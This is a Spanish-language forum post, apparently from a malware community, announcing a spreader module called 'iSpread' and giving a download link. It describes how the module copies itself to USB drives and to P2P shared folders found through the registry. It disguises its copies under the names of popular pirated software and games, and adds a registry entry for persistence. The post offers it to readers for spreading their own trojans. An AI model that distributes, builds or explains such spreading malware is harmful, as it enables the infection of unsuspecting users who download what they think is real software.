Bueno son las 3:56 de la mañana.. algo tarde pero es que he estado trabajando en algo que me ha llevado un buen rato porque he tenido que instalar todos los clientes p2p más usados por las personas para poder obtener las rutas del registro y asi poder patchear las carpetas compartidas de cada una, este modulo que les traigo aqui es un spreader, pero es y no es a la misma vez un simple spreader les explico porque :
* USB Spread : Es una modificación del modulo anterior del iUSB pero con la nueva caracteristica que comprueba si el dispositivo esta listo y asi se pueda autocopiar satisfactoriamente
* P2P Spread : Esta es la parte que más me costo trabajo , por que?
1- Tuve que instalar todos los fucking clientes p2p que ven a continuación
Esa es una imagen de la WMware con los clientes p2p instalados, eso fue necesario para poder obtener las entradas del registro de cada uno de ellos.
2- Como saben casi todos los spreaders que hay por ahi lo que hacen es coger y autocopiarse a la carpeta definida de cada uno de estos clientes, pues este spreader es distinto ya que obtiene la ruta directamente del registro con lo cual si existe el cliente p2p en el pc y el usuario cambio la ruta default del cliente se va a autocopiar de todas formas .
3- Y lo último y mejor... Obtiene los nombres del TOP de 100 Softwares y 100 Juegos más descargados de Thepiratebay y se autocopia con los mismos a las todas las carpetas P2P , si existe el archivo no se copia pero sino pasa algo como esto :
Jaja bonito no...
Y ya al final por aburrimiento le puse un addon para añadirse a las entradas del registro para que quedara algo asi :
..... Pués nada chicos este modulo de spread me ha costado algo de trabajo.. ahora si que no se pueden quejar porque no tienen para propagar su server por todas las redes de internet jeje ... Saludos a todos
Link de descarga : http://exponelo.com/files/QRBIPGCB/iSpread.rar